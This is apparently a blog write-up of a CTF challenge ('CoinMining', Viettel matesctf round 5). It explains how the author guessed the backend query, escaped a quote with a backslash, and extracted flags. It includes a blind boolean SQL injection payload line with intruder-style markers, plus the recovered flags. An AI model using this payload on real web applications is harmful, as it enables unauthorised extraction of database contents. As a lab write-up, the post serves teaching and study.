Viettel matesctf round 5 (CoinMining)

When I start with this challenge, firstly I guess SSRF, exploit bot, javascript, exploit something with Cryptocurrency, bla bla…
But solution is SQL Injection.
Firstly, Guessing how it work, I guessed it use action to call function. In the javascript file, i find getDomain() function

Secondly, Guessing the arguments, I guessed this function “getDomain” have one argument and it is coin.

I think I guess very well.
After that, I guessed the query like:

select * from [table_name] where domainName="$_POST['domainName']" and coin="$_POST['coin']"

I guessed the character ‘,” is filtered or replaced, and I guessed the character \ didn’t replace or filter.
so I guessed my solution can be used character [\] to make [‘] be [\’] and escape query.

I used my payload to exploit:

action=doCheck&domainName=smallbox.ir\&coin=or if(substr((select anything from tablewhatyouwant limit 1),§1§,1)=0x§4c§,1,0)-- -
 

and got the flag in the table flag: matesctf: matesctf: fl4g_NT_h3r3_
but I guessed it is not the truly flag.

The real flag is in bingo table: matesctf{sql_f!l73r_i$_n0&_s@’f’_’3’n0ugh!}

Trả lời

Điền thông tin vào ô dưới đây hoặc nhấn vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s